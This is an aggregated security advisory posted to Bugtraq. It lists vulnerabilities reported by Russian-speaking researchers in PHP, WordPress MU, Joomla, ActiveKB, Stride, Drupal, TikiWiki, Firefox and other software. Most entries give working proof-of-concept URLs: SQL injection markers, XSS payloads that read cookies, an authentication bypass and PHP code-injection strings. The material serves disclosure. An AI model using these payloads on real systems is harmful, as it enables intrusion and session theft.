Multiple vulnerabilities from Russian blogs have been aggregated. These findings discuss vulnerabilities in PHP versions 4 and 5, WordPress MultiUser version 1.0, ActiveKB version 1.5, Joomla! versions 1.0.13 and below, ActiveKB NX version 2.5.4, UMI CMS, Nucleus, Stride CMS versions 1.0, and more. Exploitation details provided.
fb869b5b3ce55625ab55a47de8fcf2451573a9cbadef41728be9a23809d9f5e8
Dear bugtraq@securityfocus.com,
Vulnerabilities reported by different Russian speaking authors to
http://securityvulns.ru
1. Elekt(Antichat.ru) reports protection bypass vulnerability in PHP 4
and 5.
disable_functions feature can be bypassed by using functions alias. A
list of aliases is given in http://php.net/aliases/. For example,
ini_alter() may be used instead of ini_set() and vice versa.
SecurityVulns issue: http://securityvulns.com/news/PHP/alias-pb.html
Original message (in Russian): http://securityvulns.ru/Sdocument67.html
2. MustLive reports Crossite-Cripting vulnerability in WordPress
MultiUser 1.0
XSS is possible via Username form field.
Additional information (in Ukranian): http://websecurity.com.ua/1269/
Original message (in Russian): http://securityvulns.ru/Rdocument875.html
3. durito [NGH Group] reports multiple SQL injections in ActiveKB 1.5
Example:
http://www.example.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.example.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]
Original message (in Russian): http://securityvulns.ru/Rdocument901.html
4. MustLive reports Cross-Site Scripting vulnerability in Joomla! <= 1.0.13
An example of vulnerability is
http://site/index.php?option=com_search&searchword=';alert('XSS')//
Additional information (in Ukranian): http://websecurity.com.ua/1203/
Original message (in Russian): http://securityvulns.ru/Rdocument919.html
5. durito [NGH Group] reports crossite-scripting vulnerability in
ActiveKB NX 2.5.4
Example: http://www.example.com/activekb/ActiveKB/?page=[XXS]
Original message (in Russian): http://securityvulns.ru/Rdocument956.html
6. "noname indexed" reports vulnerability in UMI CMS (http://uni-cms.ru)
Vulnerability example:
http://example.com/search/search_do/?search_string=%22%20onmouseover=%22javacript:alert();
Original message (in Russian): http://securityvulns.ru/Rdocument957.html
7. MustLive reports cross-site scripting vulnerability in Nucleus.
Example: http://site/index.php?blogid=1&archive=2007-01-01%3Cscript%3Ealert(document.cookie)%3C/script%3E
Additional information (in Ukranian): http://websecurity.com.ua/1347/
Original message (in Russian): http://securityvulns.ru/Sdocument3.html
8. durito [NGH Group] reports
8.1 multiple SQL injections in Stride v1.0 Content Management System,
Merchant, Courses. Examples:
Content Management System
http://www.example.com/main.php?p=[SQL]
Merchant
http://www.example.com/shop.php?cmd=sto&id=[SQL]
Courses
http://www.example.com/detail.php?course=[SQL]
http://www.example.com/detail.php?provider=[SQL]
8.2 Information leak (FTP access account) with MyFTPUploader within
same applications. Example:
http://www.example.com/include/imageupload.js
contains
document.writeln('<param name="uploadDirectory" value="/public_html/dbimages/process">');
document.writeln('<param name="successURL" value="admin_imagemulti.php?action=process">');
document.writeln('<param name="host" value="www.target.com">');
document.writeln('<param name="userName" value="target">');
document.writeln('<param name="password" value="target">');
8.3 Default administrator's password for same applications.
Original message (in Russian): http://securityvulns.ru/Sdocument4.html
9. MustLive reports multiple crossite scripting vulnerabilities in
Site-Up <= 2.64
Via "search" and "search mask" fields of http://site/siteuprus/index.cgi:
Additional information (in Ukranian): http://websecurity.com.ua/1210/
Original message: (in Russian): http://securityvulns.ru/Sdocument12.html
10. MustLive reports crossite scripting in Google Search Appliance.
Example: http://site/search?ie=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x'
Additional information (in Ukranian): http://websecurity.com.ua/1368/
Original message (in Russian): http://securityvulns.ru/Sdocument32.html
10. MustLive reports crossite scripting in PRO-search
Example: http://site/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Additional information (in Ukranian): http://websecurity.com.ua/1224/
Original message (in Russian): http://securityvulns.ru/Sdocument68.html
10. MustLive reports multiple vulnerabilities in Urchin Web Analytics
5.7.03.
In addition to re-discovered XSS vulnerability, there is also
authentication bypass (access without username/password).
Example: http://site:10000/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4>ype=5
Additional information (in Ukranian): http://websecurity.com.ua/1283/
Original message: (in Russian): http://securityvulns.ru/Sdocument90.html
11. MustLive reports crossite scripting vulnerability in Mozilla Firefox
<= 2.0 with gopher: protocol URL if UTF-7 if page content is displayed as
UTF-7. Examples:
For Firefox before 2.0:
gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-
gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-
For Firefox 2.0:
gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-
gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-
According to author, it's possible to execute script in both local zone
and context of gopher site.
12. ShAnKaR reports PHP Zend Hash vulnerability exploitation vector
with Drupal <= 5.2.
Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();
Original message (in Russian): http://securityvulns.ru/Sdocument137.html
13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.
Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
Original message (in Russian):
http://securityvulns.ru/Sdocument162.html
Also, multiple vulnerabilities were reported in English by
:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/